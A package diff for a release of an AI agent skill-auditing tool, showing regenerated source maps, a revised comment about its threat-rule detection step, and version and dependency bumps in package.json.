{"version":3,"file":"cli.js","sourceRoot":"","sources":["../src/cli.ts"],"names":[],"mappings":";AACA;;;;;;;;GAQG;AAEH,OAAO,EAAE,UAAU,EAAE,MAAM,YAAY,CAAC;AACxC,OAAO,EAAE,OAAO,EAAE,IAAI,EAAE,MAAM,kBAAkB,CAAC;AACjD,OAAO,EAAE,IAAI,EAAE,OAAO,EAAE,MAAM,WAAW,CAAC;AAC1C,OAAO,EAAE,UAAU,EAAE,MAAM,SAAS,CAAC;
|
|
1
|
+
{"version":3,"file":"cli.js","sourceRoot":"","sources":["../src/cli.ts"],"names":[],"mappings":"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"}
|
package/dist/index.js
CHANGED
|
@@ -40,7 +40,7 @@ export async function auditSkill(skillDir, options) {
|
|
|
40
40
|
checks.push(checkDependencies(manifest));
|
|
41
41
|
checks.push(checkPermissions(manifest));
|
|
42
42
|
}
|
|
43
|
-
// ATR pattern detection (
|
|
43
|
+
// ATR pattern detection (the current ATR ruleset including CJK-aware patterns + cloud rules)
|
|
44
44
|
if (manifest && !options?.skipATR) {
|
|
45
45
|
checks.push(await checkWithATR(manifest, options?.cloudRules));
|
|
46
46
|
}
|
package/dist/index.js.map
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"index.js","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"AAAA;;;;;;;;;GASG;AAEH,OAAO,EAAE,kBAAkB,EAAE,MAAM,sBAAsB,CAAC;AAC1D,OAAO,EAAE,aAAa,EAAE,MAAM,4BAA4B,CAAC;AAC3D,OAAO,EAAE,iBAAiB,EAAE,MAAM,+BAA+B,CAAC;AAClE,OAAO,EAAE,SAAS,EAAE,MAAM,wBAAwB,CAAC;AACnD,OAAO,EAAE,iBAAiB,EAAE,MAAM,8BAA8B,CAAC;AACjE,OAAO,EAAE,gBAAgB,EAAE,MAAM,8BAA8B,CAAC;AAChE,OAAO,EAAE,WAAW,EAAE,MAAM,sBAAsB,CAAC;AACnD,OAAO,EAAE,YAAY,EAAE,MAAM,uBAAuB,CAAC;AACrD,OAAO,EAAE,kBAAkB,EAAE,MAAM,6BAA6B,CAAC;AACjE,OAAO,EAAE,kBAAkB,EAAE,MAAM,kBAAkB,CAAC;AACtD,OAAO,EAAE,oBAAoB,EAAE,MAAM,sBAAsB,CAAC;AAW5D,OAAO,EAAE,kBAAkB,EAAE,MAAM,sBAAsB,CAAC;AAE1D;;;;;;GAMG;AACH,MAAM,CAAC,KAAK,UAAU,UAAU,CAAC,QAAgB,EAAE,OAAsB;IACvE,MAAM,SAAS,GAAG,IAAI,CAAC,GAAG,EAAE,CAAC;IAE7B,oBAAoB;IACpB,MAAM,QAAQ,GAAG,MAAM,kBAAkB,CAAC,QAAQ,CAAC,CAAC;IAEpD,oBAAoB;IACpB,MAAM,MAAM,GAAkB,EAAE,CAAC;IAEjC,oDAAoD;IACpD,MAAM,CAAC,IAAI,CAAC,aAAa,CAAC,QAAQ,CAAC,CAAC,CAAC;IAErC,IAAI,QAAQ,EAAE,CAAC;QACb,MAAM,CAAC,IAAI,CAAC,iBAAiB,CAAC,QAAQ,CAAC,YAAY,CAAC,CAAC,CAAC;QACtD,MAAM,CAAC,IAAI,CAAC,iBAAiB,CAAC,QAAQ,CAAC,CAAC,CAAC;QACzC,MAAM,CAAC,IAAI,CAAC,gBAAgB,CAAC,QAAQ,CAAC,CAAC,CAAC;IAC1C,CAAC;IAED
|
|
1
|
+
{"version":3,"file":"index.js","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"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"}
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@panguard-ai/panguard-skill-auditor",
|
|
3
|
-
"version": "1.
|
|
3
|
+
"version": "1.7.1",
|
|
4
4
|
"license": "MIT",
|
|
5
5
|
"repository": {
|
|
6
6
|
"type": "git",
|
|
@@ -26,15 +26,16 @@
|
|
|
26
26
|
"files": [
|
|
27
27
|
"dist",
|
|
28
28
|
"package.json",
|
|
29
|
-
"README.md"
|
|
29
|
+
"README.md",
|
|
30
|
+
"LICENSE"
|
|
30
31
|
],
|
|
31
32
|
"dependencies": {
|
|
32
|
-
"agent-threat-rules": "^3.
|
|
33
|
+
"agent-threat-rules": "^3.5.0",
|
|
33
34
|
"js-yaml": "^4.1.0",
|
|
34
|
-
"@panguard-ai/atr": "1.
|
|
35
|
-
"@panguard-ai/core": "1.
|
|
36
|
-
"@panguard-ai/scan
|
|
37
|
-
"@panguard-ai/
|
|
35
|
+
"@panguard-ai/atr": "1.7.1",
|
|
36
|
+
"@panguard-ai/core": "1.7.1",
|
|
37
|
+
"@panguard-ai/panguard-scan": "1.7.1",
|
|
38
|
+
"@panguard-ai/scan-core": "1.7.1"
|
|
38
39
|
},
|
|
39
40
|
"devDependencies": {
|
|
40
41
|
"@types/js-yaml": "^4.0.9",
|